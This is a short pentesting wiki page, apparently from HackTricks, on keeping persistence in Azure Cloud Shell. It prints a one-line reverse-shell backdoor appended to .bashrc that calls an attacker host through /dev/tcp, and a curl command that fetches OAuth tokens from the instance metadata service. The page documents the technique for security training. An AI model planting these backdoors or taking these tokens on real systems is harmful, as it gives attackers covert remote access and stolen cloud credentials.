# Az - Cloud Shell Persistence

{{#include ../../../banners/hacktricks-training.md}}

## Cloud Shell Persistence

Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:

* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.

Example backdoor in .bashrc:

```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
```

This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.

Additionally query Azure’s metadata service for instance details and tokens:
```bash
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
```


{{#include ../../../banners/hacktricks-training.md}}